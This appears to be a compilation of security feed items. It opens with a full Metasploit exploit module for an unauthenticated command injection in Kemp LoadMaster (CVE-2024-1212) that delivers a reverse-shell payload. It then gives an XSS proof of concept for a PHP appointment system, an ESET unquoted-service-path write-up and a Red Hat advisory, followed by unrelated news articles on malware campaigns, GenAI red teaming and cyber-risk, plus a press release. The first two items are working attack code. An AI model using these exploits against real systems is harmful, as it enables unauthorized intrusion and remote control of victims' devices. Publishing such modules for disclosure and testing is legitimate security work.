This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Kemp LoadMaster in the authorization header after version 7.2.48.1. The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF), and 7.2.48.10 (LTS).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def flag_file    return @flag_file unless @flag_file.nil?    @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)  end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in          Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.          The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and          7.2.48.10 (LTS).        },        'Author' => [          'Dave Yesland with Rhino Security Labs',        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-1212'],          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']        ],        'DisclosureDate' => '2024-03-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Automatic', # Add logic to run the payload only once            {              'Payload' => {                'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",                'Append' => ')',                'BadChars' => "\x3a\x27"              }            }          ],          [            'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions            {              'Payload' => {                'BadChars' => "\x3a\x27"              }            }          ]        ],        'Default_target' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',          'FETCH_WRITABLE_DIR' => '/tmp/',          'SSL' => true,          'RPORT' => 443        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])    ])  end  def exploit    uri = normalize_uri(target_uri.path, 'access', 'set')    vprint_status('Sending payload...')    send_request_cgi({      'method' => 'GET',      'uri' => uri,      'vars_get' =>        {          'param' => 'enableapi',          'value' => '1'        },      'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),      'verify' => false    })  end  def on_new_session(client)    super    print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')  end  def check    print_status("Checking if #{peer} is vulnerable...")    uri = normalize_uri(target_uri.path, 'access', 'set')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'vars_get' => {        'param' => 'enableapi',        'value' => '1'      },      'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),      'verify' => false    })    # No response from server    unless res      return CheckCode::Unknown    end    # Check for specific error pattern in headers or body to confirm vulnerability    if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')      return CheckCode::Vulnerable    else      return CheckCode::Safe    end  endend

Kemp LoadMaster Unauthenticated Command Injection

Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.

# Application Name: Doctor Appointment Management System  
# Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)  
# Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)  
# BuG: XsS  
# BUG_Author: SoSPiro  
# Version: 1.0  
# CVE: CVE-2024-4293

### Vulnerable code section:

- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`  
- **`Lines 57-61`**

- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`

 ```php  
<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];  
?>  
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>

```  
- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

### Vulnerability Description:

- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.

### Proof of Concept (PoC)

- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)

- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)

```http

POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 60  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php  
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: blue

fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=

```

- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:

`<script>alert(1)</script>`

- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.

### Impact:

- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.

### Reproduce:

- [ -vuldb.com- ](https://vuldb.com/?id.262225)

- [  -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)

- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)

- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)

Doctor Appointment Management System 1.0 Cross Site Scripting

ESET NOD32 Antivirus version 17.1.11.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET NOD32 Antivirus 17.1.11.0 - Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2024-04-27# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# Vendor : https://www.eset.com# Version : 17.1.11.0# Tested on OS: Microsoft Windows 10 pro x64About Unquoted Service Path :==============================When a service is created whose executable path contains spaces and isn'tenclosed within quotes, leads to a vulnerability known as Unquoted ServicePath which allows a user to gain SYSTEM privileges.(only if the vulnerable service is running with SYSTEM privilege levelwhich most of the time it is).C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESETSecurity\ekrn.exeC:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Red Hat Security Advisory 2024-2086-03 - An update for shim is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer overflow, bypass, integer overflow, and out of bounds read vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2086.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: shim security update  
Advisory ID:        RHSA-2024:2086-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2086  
Issue date:         2024-04-29  
Revision:           03  
CVE Names:          CVE-2023-40546  
====================================================================

Summary: 

An update for shim is now available for Red Hat Enterprise Linux 8.6 Extended  
Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The shim package contains a first-stage UEFI boot loader that handles chaining  
to a trusted full boot loader under secure boot environments.

Security Fix(es):

* shim: RCE in http boot support may lead to Secure Boot bypass (CVE-2023-40547)

* shim: Interger overflow leads to heap buffer overflow in verify_sbat_section  
on 32-bits systems (CVE-2023-40548)

* shim: Out-of-bounds read printing error messages (CVE-2023-40546)

* shim: Out-of-bounds read in verify_buffer_authenticode() malformed PE file  
(CVE-2023-40549)

* shim: Out-of-bound read in verify_buffer_sbat() (CVE-2023-40550)

* shim: out of bounds read when parsing MZ binaries (CVE-2023-40551)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-40546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2234589  
https://bugzilla.redhat.com/show_bug.cgi?id=2241782  
https://bugzilla.redhat.com/show_bug.cgi?id=2241796  
https://bugzilla.redhat.com/show_bug.cgi?id=2241797  
https://bugzilla.redhat.com/show_bug.cgi?id=2259915  
https://bugzilla.redhat.com/show_bug.cgi?id=2259918

Red Hat Security Advisory 2024-2086-03

By embracing a proactive approach to cyber-risk management, companies can better detect, prevent, and mitigate cyber threats while integrating the latest state-of-the-art technology.

Source: NicoElNino via Alamy Stock Photo

COMMENTARY

In today's fast-paced world, most businesses are racing to incorporate the latest technology and innovations to meet the demands of customers craving convenience and accessibility. After all, who doesn't love banking from their phone 24/7 or shopping from their couch?

To meet these demands, companies rush to implement new technology as quickly as it emerges, but while enhancing business operations is undeniably lucrative, it comes with a price: Risk. As we embrace all the luxuries of innovation, cybercriminals are poised to exploit the vulnerabilities that these changes expose. Industries like healthcare and financial services are especially attractive targets, due to the valuable data and assets they are entrusted to protect, but cybercrime poses a threat to all. As a result, taking a proactive approach to managing cyber-risk, which involves pre-emptive and continuous action to assess and address risks caused by innovation, is being emphasized as a strategic necessity.

Traditional cybersecurity practices are like playing a never-ending game of whack-a-mole, because just as soon as one risk or vulnerability is addressed, another one pops up, presenting a new challenge. This can be frustrating, time-consuming, and ineffective in the rapidly evolving threat landscape. This ever-changing complexity further highlights the dynamic landscape of cybersecurity. We know that risk is an inherent part of all change — whether opening a new physical location, merging with another company, or implementing an online bill pay system, any modifications open the door to new vulnerabilities. Sounds bleak, right? Yes, the warnings about risk are ominous, but there is a way for businesses to participate in innovation successfully and prepare for the inevitable risk … and it's all about embracing a new mindset.

In the latest annual Global CEO Survey by PwC, CEOs in the financial sector and capital markets reported a significant concern over the threat to profitability due to changing consumer demands and behaviors. As a way to tackle this possible problem, CEOs invest significantly in technology such as AI and cloud solutions by automating processes and systems to improve the customer experience — a proactive measure to mitigate a possible threat to their bottom line.

However, a lack of attention to cybersecurity during the implementation of these technology solutions poses a significant risk to organizations where trust is critical. Cybersecurity is often an afterthought as companies integrate new processes and, especially, new technologies. This mindset leaves your business and your customers vulnerable to threat actors, so it’s time to substantially shift how change, risk, and strategy are perceived.

**An Action Plan**

Integrating cybersecurity defenses in tandem with new technology — not as a reactive action because a threat suddenly popped up — is the most effective route. Put the mallet down and approach cyber-risk with real-time data so your company stays ahead of emerging threats, instead of standing poised and hoping your reaction is well-timed. The development of technologies should be designed and planned with possible exposure to risk at the forefront. This proactive method simultaneously addresses both challenges, improves their performance through technology, and bolsters security measures. To implement this approach, a cyber framework that integrates with new projects at every stage can be implemented, even if it means extending the development timeline. In that way, businesses can address both challenges in a complementary manner, enhancing performance through technology while becoming more cyber secure.

This approach not only protects against cyber threats but also improves customer experience, since customers often demand seamless, convenient, and secure services. By integrating cybersecurity in tandem with technology implementation, companies across all industries can improve their customer experience while retaining trust. 

It’s important for businesses to work with a trusted partner in cyber-risk management to evaluate new technology for risk as it is created, rather than reacting to the risk that the technology triggered. This approach allows your company to identify potential vulnerabilities in new technology early on and implement appropriate security measures to mitigate the risks rather than addressing them after your business and your customers are already at risk. This assessment can identify potential vulnerabilities in the technology and determine the level of risk associated with each vulnerability. Based on this assessment, a plan is developed to mitigate the risks and ensure the security of systems and data. The information can be leveraged to create and implement policies and procedures for managing and monitoring the new technology to ensure ongoing security.

These recommendations serve as a reminder that being proactive doesn't just involve addressing risk due to a new product or service offering. It also means being proactive in defining, adopting, and measuring the effectiveness of risk assessments, as well as implementing the best practices that can mitigate these risks before they occur.

By embracing a proactive approach to cyber-risk management as a whole, companies across all industries can better detect, prevent, and mitigate cyber threats while integrating the latest state-of-the-art technology. And the best part? You can put that mallet away, because your company will detect threats before they even have a chance to pop up.

**About the Author(s)**

CEO, DefenseStorm

Steve Soukup has served as Chief Executive Officer at DefenseStorm since 2020 and in that role is responsible for leading all aspects of the company’s business. He is passionate about building a community of trust among our teams and with our customers while also enabling our customers to do the same with their account holders. Steve joined DefenseStorm as Chief Revenue Officer in May 2017 with a charge to drive growth for the business while leveraging his extensive experience serving the banking vertical. He was promoted to President in October 2019 and then to CEO in April of 2020. Under his leadership, DefenseStorm has set the standard for enabling banks and credit unions to achieve cyber risk readiness. Steve is a graduate of Boston College and earned a Master of Business Administration degree from Boston University. A native of Cleveland, Ohio, Steve and his family have called the Atlanta area home for over 10 years.

Addressing Risk Caused by Innovation

Red teaming is a crucial part of proactive GenAI security that helps map and measure AI risks.

Source: josefotograf via Alamy

Generative artificial intelligence (GenAI) has emerged as a significant change-maker, enabling teams to innovate faster, automate existing workflows, and rethink the way we go to work. Today, more than 55% of companies are currently piloting or actively using GenAI solutions.

But for all its promise, GenAI also represents a significant risk factor. In an ISMG poll of business and cybersecurity professionals, respondents identified a number of concerns around GenAI implementation, including data security or leakage of sensitive data, privacy, hallucinations, misuse and fraud, and model or output bias.

For organizations looking to create additional safeguards around GenAI use, red teaming is one strategy they can deploy to proactively uncover risks in their GenAI systems. Here's how it works.

**Unique Considerations When Red Teaming GenAI**

GenAI red teaming is a complex, multistep process that differs significantly from red teaming classical AI systems or traditional software.

For starters, while traditional software or classical AI red teaming is primarily focused on identifying security failures, GenAI red teaming must account for responsible AI risks. These risks can vary widely, ranging from generating content with fairness issues to producing ungrounded or inaccurate information. GenAI red teaming has to explore potential security risks and responsible AI failures simultaneously.

Additionally, GenAI red teaming is more probabilistic than traditional red teaming. Executing the same attack path multiple times on traditional software systems is likely to yield similar results.

However, due to its multiple layers of nondeterminism, GenAI can provide different outputs for the same input. This can happen due to app-specific logic or the GenAI model itself. Sometimes the orchestrator that controls the output of the system can even engage different extensibility or plug-ins. Unlike traditional software systems with well-defined APIs and parameters, red teams must account for the probabilistic nature of GenAI systems when evaluating the technology.

Finally, system architectures vary widely between different types of GenAI tools. There are standalone applications, integrations with existing applications, and input and output modalities, like text, audio, images, and videos, for teams to consider.

These different system architectures make it incredibly difficult to conduct manual red-team probing. For example, to surface violent content generation risks on a browser-hosted chat interface, red teams would need to try different strategies multiple times to gather sufficient evidence of potential failures. Doing this manually for all types of harm, across all modalities and strategies, can be exceedingly tedious and slow.

**Best Practices for GenAI Red Teaming**

While manual red teaming can be a time-consuming, labor-intensive process, it's also one of the most effective ways to identify potential blind spots. Red teams can also scale certain aspects of probing through automation, particularly when it comes to automating routine tasks and helping identify potentially risky areas that require more attention.

At Microsoft, we use an open automation framework — known as the Python Risk Identification Tool for generative AI (PyRIT) — to red team GenAI systems. It is not intended to replace manual GenAI red teaming, but it can augment red teamers' existing domain expertise, automate tedious tasks, and create new efficiency gains by identifying hot spots for potential risks. This allows security professionals to control their GenAI red-teaming strategy and execution while PyRIT provides the automation code to generate potentially harmful prompts based on the initial dataset of harmful prompts provided by the security professional. PyRIT can also change tactics based on the GenAI system's response and generate its next input. 

Regardless of the method you use, sharing GenAI red-teaming resources like PyRIT across the industry raises all boats. Red teaming is a crucial part of proactive GenAI security, enabling red teamers to map AI risks, measure identified risks, and build out scoped mitigations to minimize their impact. In turn, this empowers organizations with the confidence and security they need to innovate responsibly with the latest AI advances.

— Read more Partner Perspectives from Microsoft Security

**About the Author(s)**

Microsoft

Protect it all with Microsoft Security.

Microsoft offers simplified, comprehensive protection and expertise that eliminates security gaps so you can innovate and grow in a changing world. Our integrated security, compliance, and identity solutions work across platforms and cloud environments, providing protection without compromising productivity.

We help customers simplify the complex by prioritizing risks with unified management tools and strategic guidance created to maximize the human expertise inside your company. Our unparalleled AI is informed by trillions of signals so you can detect threats quickly, respond effectively, and fortify your security posture to stay ahead of ever-evolving threats.

How to Red Team GenAI: Challenges, Best Practices, and Learnings

By Deeba Ahmed
New Android malware alert! Brokewell steals data, takes over devices & targets your bank. Learn how this sneaky malware works & what you can do to protect yourself. Stop Brokewell before it stops you!
This is a post from HackRead.com Read the original post: Fake Chrome Updates Hide Android Brokewell Malware Targeting Your Bank

Brokewell malware poses a new cybersecurity threat to your device and personal information. Unlike your typical data-stealing app, Brokewell takes it a step further by granting attackers near-complete control of your phone.

In their report, fraud risk firm ThreatFabric’s threat intelligence researchers shared details of a newly discovered Android banking malware dubbed Brokewell, which uses overlay attacks to capture user credentials and steal cookies.

Further probing revealed a repository called “Brokewell Cyber Labs,” created by an individual “Baron Samedit.”  This repository hosted the source code for the “Brokewell Android Loader,” a tool designed to bypass Android 13+ accessibility restrictions and widely used by cybercriminals.

Brokewell has previously been used in campaigns targeting “buy now, pay later” financial services like Klarna and in exploiting the Austrian digital authentication application, ID Austria.

****Fake Updates, Real Danger****

Brokewell hides behind a familiar facade – fake software updates. It typically masquerades as a critical update for Google Chrome, tricking users into downloading and installing it. Once installed, Brokewell unleashes its wrath as it isn’t just after your login credentials. It’s a comprehensive toolkit for conducting a wide-scale data theft. 

Fake Chrome browser update as seen by ThreatFabric

The trojan uses its own WebView to load a legitimate website and dumps session cookies after the victim completes the login process. Brokewell also has “accessibility logging” capabilities, capturing every event on the device, posing a threat to all installed applications.

****What Information is at Stake?****

Brokewell can steal a wide range of information, including call logs, text messages, and contact lists. Moreover, it looks for your financial apps and if found, it overlays fake login screens on top of legitimate banking apps, capturing your login details without you realizing it.

The most problematic part is that Brokewell grants attackers remote access to your device. It supports spyware functionalities, collecting device information, geolocation, and recording audio. After stealing credentials, the actors can initiate a Device Takeover attack using remote control capabilities.

****An Evolving Threat****

In their blog post, ThreatFabric researchers warned that althoughBrokewell is under active development, the malware’s creators are constantly adding new features to enhance its capabilities.

To protect yourself from Brokewell and other malicious software, download apps from the official Google Play Store only.  Be cautious of fake updates and always use a reputable security app. Staying updated on the latest Android security threats is crucial to protect your device.

****Experts’ Opinion****

Ray Kelly, Fellow from Synopsys Software Integrity Group shared their thoughts on Brokewell’s discovery with Hackread.com stating, _“_As a policy, users should never install apps outside of the Google and Apple stores as Malware often sneaks in through ‘side loading’ apps, especially on rooted or jailbroken devices from fake stores._“_

“What makes this instance different is that the malicious app sideloaded on non-rooted devices and bypassed Google’s security measures,” stressed Ray. _“_The key takeaway is don’t fall for web popups prompting app updates; always rely on the Play Store for updates to safeguard against such threats._“_

1.  Android TV Boxes Infected with Backdoors
2.  SpyNote Android Spyware Poses as Legit Crypto Wallets
3.  Fake YouTube Android Apps Used to Distribute CapraRAT
4.  Xamalicious Backdoor Infects 25 Apps, Affects 327K Devices
5.  Android Malware FjordPhantom Steals Funds Via Virtualization

Fake Chrome Updates Hide Android Brokewell Malware Targeting Your Bank

By Deeba Ahmed
Beware! Agent Tesla & Taskun Malware are targeting US Education & Gov. This cyberattack steals data & exploits vulnerabilities. Learn how to protect schools & government agencies from this double threat!
This is a post from HackRead.com Read the original post: Agent Tesla and Taskun Malware Targeting US Education and Govt Entities

A new wave of cyberattacks has set its sights on the sensitive data within the US education and government sectors, discovered cybersecurity researchers at the cybersecurity platform, Veriti. This campaign leverages a combination of two malware strains: Agent Tesla and Taskun.

****Agent Tesla and Taskun- The Deceptive Duo****

Agent Tesla is an infamous malware and sophisticated spyware, designed to steal a user’s most valuable data. The malware is known for capturing keystrokes, screenshots, and even login credentials for various applications including browsers and VPNs. With this stolen information, attackers gain unauthorized access to user’s accounts and potentially sensitive systems.

On the other hand, according to Veriti’s blog post, Taskun serves as the perfect accomplice for Agent Tesla’s malicious activities. It works by compromising a system’s integrity, creating a backdoor for Agent Tesla to infiltrate and establish persistence. This allows Agent Tesla to remain undetected for extended periods, deepening its hold on the system and maximizing data theft.

It’s important to highlight that Taskun and Agent Tesla were recently discovered as accomplices in a similar campaign. Researchers observed TicTacToe Dropper targeting Windows devices, subsequently infecting them with Leonem, AgentTesla, SnakeLogger, LokiBot, Remcos, RemLoader, Sabsik, Taskun, Androm, and Upatre.

****Attackers’ Calculated Approach****

As for the latest, campaign, the attack is launched through malicious email attachments exploiting vulnerabilities in Windows OS software like Microsoft Office, one of the most exploited software in malware attacks.

The attackers’ strategy centers around performing reconnaissance to identify vulnerabilities within the targeted systems. This approach often exploits weaknesses in commonly used office applications and operating systems. By targeting these widespread vulnerabilities, the attackers can maximize the impact of their attack, potentially compromising a vast number of devices within an organization.

Phishing emails as observed by Veriti

****Why Education and Government Sectors are Vulnerable****

Educational institutions and government agencies often hold a treasure trove of sensitive data, making them prime targets for cybercriminals. This data can include student records, research findings, social security numbers, and other confidential information.

Moreover, schools have been identified as highly lucrative targets for cybercriminals. Both in the past and recently, hackers have targeted over 900 schools in the United States by exploiting the notorious MOVEit vulnerability.

A successful attack using Agent Tesla and Taskun could result in a significant data breach, causing immense financial loss, reputational damage, and even identity theft for affected individuals.

****How to Fight Back?****

Institutions can strengthen their cybersecurity defences against cyber threats by applying security patches promptly, educating users on cybersecurity awareness, and implementing a multi-layered security approach. Regularly patching vulnerabilities, providing cybersecurity awareness training, and implementing a multi-layered security approach can help protect sensitive data.

1.  Microsoft Outlook Flaw Exploited by Russian Forest Blizzard
2.  Retired Software Exploited To Target Power Grids, Microsoft
3.  Microsoft Teams Flaw Sends Malware to Employees’ Inboxes
4.  Researchers Warn of New Microsoft Office 0-Day Flaw Follina
5.  NodeStealer Mimics ‘Microsoft’ to Hack Facebook, Browser Data

Agent Tesla and Taskun Malware Targeting US Education and Govt Entities

The volume of malicious cyber activity against the Philippines quadrupled in the first quarter of 2024 compared to the same period in 2023.

Source: robertharding via Alamy Stock Photo

A recent massive spike in cyber misinformation and hacking campaigns against the Philippines coincides with rising tensions between the country and its superpower neighbor China.

The cyberattacks consist of a combination of hack and leak (55%), distributed denial-of-service (10%), and misinformation and influence campaigns (35%), according to researchers at Resecurity who have been following the campaigns. The main targets are government (80%) and educational institutions (20%) in the Philippines, and these attacks — on police agencies, government ministries, and universities — and associated data leaks are sowing discontent in the country, according to the researchers.

This represents a four-fold (325%) increase in what the researchers identify as malicious cyber-espionage activity targeting the Philippines in the first quarter of 2024 compared to the same period last year. "The goal of this activity is to discredit the government and create chaos via cyberspace, as the Philippine population also relies on digital media channels and is active on social media networks," says Shawn Loveland, COO of Resecurity.

Resecurity has worked with authorities in the Philippines to trace back the source of attacks to online infrastructures in China and Vietnam. These "false flag" and "other territories" could be allies of China in such campaigns or provide them infrastructure for it, according to Resecurity.

**Fake News**

The goal of the cyberattacks correlates with disinformation campaigns spinning Chinese narratives on topics such as regional disputes about territories in the South China Sea.

In a blog post this month, Resecurity detailed the myriad of different groups associated with this collective activity. In one notable attack, a threat actor going by the alias "KryptonZambie" claimed to have obtained from unnamed sources over 152 gigabytes of stolen data containing Philippine citizen identity cards. Resecurity investigated this claim, which related to a post on Breach Forums, a Dark Web site, but found it unsubstantiated. The threat actor did not respond to any messages Resecurity investigators sent to a Telegram account used to publicize the supposed breach.

Other elements of the campaign involved posting an "audio deepfake" of Philippine President Ferdinand Marcos Jr. supposedly ordering military action against China. No such directive exists, according to authorities in the Philippines.

It’s not all fakery, however. Several of the groups covered by Resecurity's report — including  Philippines Exodus Security and DeathNote Hackers — ran attacks that led to a confirmed data breach.

**Not Real Hacktivists**

While some of this activity might resemble that of hactivists, Resecurity believes nation state-backed hackers from China or possibly North Korea (another regional adversary to the Philippines) are really to blame.

Resecurity has reported over 12 government organizations in the Philippines being targeted in the same timeframe — hallmarks of a well-organised co-ordinated attack by nation-state actors rather than independent hacktivists.

"Leveraging hacktivist-related monikers allows threat actors to avoid attribution while creating the perception of homegrown social conflict online," according to Resecurity.

Last year a Chinese state-linked advanced persistent threat (APT) group known as Mustang Panda hacked a Philippine government target via a simple side-loading technique. "This group has a strong focus on Philippines and \[is\] still active," according to Resecurity. Hacks by the group on Philippine government entities have been actively promoted via social media.

In April 2023, more than 800 gigabytes of both applicant and employee records from multiple state agencies — including the Philippine National Police (PNP), National Bureau of Investigation (NBI), Bureau of Internal Revenue (BIR), and Special Action Force (SAF) — were compromised.

This was followed in September by a breach and ransomware attack on the Philippine Health Insurance Corporation (PhilHealth) that led to the exposure of hospital bills, internal memos, and identification documents. There remains an ongoing investigation into the full extent of the leak, according to cyber threat detection firm Gatewatcher.

**Why Spy?**

China (and to a lesser extent North Korea) is the prime suspect in much of this malfeasance, according to both Resecurity and other threat intel experts.

"China is a far more complex and nuanced territory than generally portrayed. Its internal pressures are likely to lead to increased cyber-espionage activity, rather than slowing it down,"  says Ian Thornton-Trump, CISO at threat intel firm Cyjax.

"The PRC's approach to cyberspace has always been to use it to advance its business interests, extracting technologies from Western companies and creating a protected domestic market for these industries, giving them an advantage in the global market," Thornton-Trump notes.

Relations between China and the Philippines have deteriorated over recent months. Beijing condemned Filipino President Ferdinand Marcos Jr.'s congratulations to Taiwanese President-elect Lai following the latter's recent election. China regards Taiwan as a renegade province.

The Philippines has recently reaffirmed its strong alliance with the United States, announcing plans for "more robust" military activities with the US and its allies, much to the chagrin of China. In addition, the Philippines and China are in dispute over territorial claims involving islands and waters in the South China Sea.

**Incident Response**

The US, Japan, and the Philippines recently entered a cyber threat-sharing arrangement in the wake of rising attacks by China, North Korea, and Russia, a development likely to help the Philippines stay on top of the growing tide of cyberthreats.

Understanding the pattern of upsurge in malign cyber activity is the first step towards combatting it, experts say. "\[With\] a better understanding of the country's internal forces, and how these relate to its cyber strategy, we can plan better defenses against PRC cyber espionage," Cyjax's Thornton-Trump says.

Resecurity offered recommendations to safeguard both the populace and Philippine business from cyberattacks:

*   Accelerate digital identity protection of Philippine citizens — as hack and leak activity is putting their personal data at risk of being exposed.
    
*   Tighten Web application security by implementing WAFs (web application firewalls) and ongoing vulnerability assessment and pen-testing automation procedures to detect and contain vulnerabilities before bad actors exploit them.
    
*   Create fact-checking services online to combat disinformation and influence campaigns. Citizens should be offered a process for reporting suspicious online activity.
    

**About the Author(s)**

John Leyden is an experienced cybersecurity writer, having previously written for the Register and Daily Swig.

Image source: Dorota Szymczyk via Alamy Stock Photo

Philippines Pummeled by Assortment of Cyberattacks &amp; Misinformation Tied to China

PRESS RELEASE

Montreal, Quebec, Canada – April 25, 2024 – Flare, a global leader in Threat Exposure Management, is pleased to announce that renowned cybersecurity expert Jason Haddix has joined the organization as Field CISO. 

Jason Haddix (aka @jhaddix) is CEO, hacker, and trainer for Arcanum Information Security, a world class and highly sought cybersecurity assessment and training company. Over his 20-year career in cybersecurity, Jason has held numerous high profile roles, including as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. 

Jason is well-known throughout the cybersecurity community, having authored a number of talks on offensive security methodology. Over the years he has spoken at many high profile security conferences, including DEFCON, BSides, BlackHat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, and Toorcon.

"We are excited to welcome Jason to the Flare team as a strategic advisor. His exceptional background, depth of knowledge, and vision in cyber make him the perfect fit to help us accelerate our expansion and recognition as a leader in Threat Exposure Management,” said Flare CEO Norman Menz. “Jason’s appointment reaffirms our commitment to staying one step ahead in the continually evolving cyber threat landscape, and to maintaining the highest security standards for our clients." 

In his strategic advisory role as Field CISO, Jason will leverage his deep industry expertise to forge connections within the cybersecurity community, and will help guide Flare’s security strategies and product vision. Jason’s diverse background will bring fresh perspectives and help enrich Flare's approach to addressing critical security challenges and shaping strategic initiatives.

"Joining Flare offers me a unique opportunity to contribute to the company’s mission of excellence in Cyber Threat Exposure Management, while also continuing my commitment to Arcanum,” said Jason. “I’m excited to share my experience and work alongside Flare's talented team to drive forward-looking security initiatives and cutting-edge product features. I’m looking forward to being an integral part of Flare’s commitment to protecting customers and leveling the playing field for defenders in the cyber security realm.”

To learn more about the rest of the team driving Flare’s growth in the Threat Exposure Management space, visit https://flare.io/company/team/. 

About Flare

Flare is at the forefront of Threat Exposure Management, delivering AI-driven solutions that provide comprehensive, real-time threat analysis and remediation. With its advanced technology, Flare offers a proactive approach to cybersecurity, scanning the online world, including the clear and dark web, to identify, prioritize, and address potential threats swiftly and efficiently. For more information, visit https://flare.io.

Tag

#auth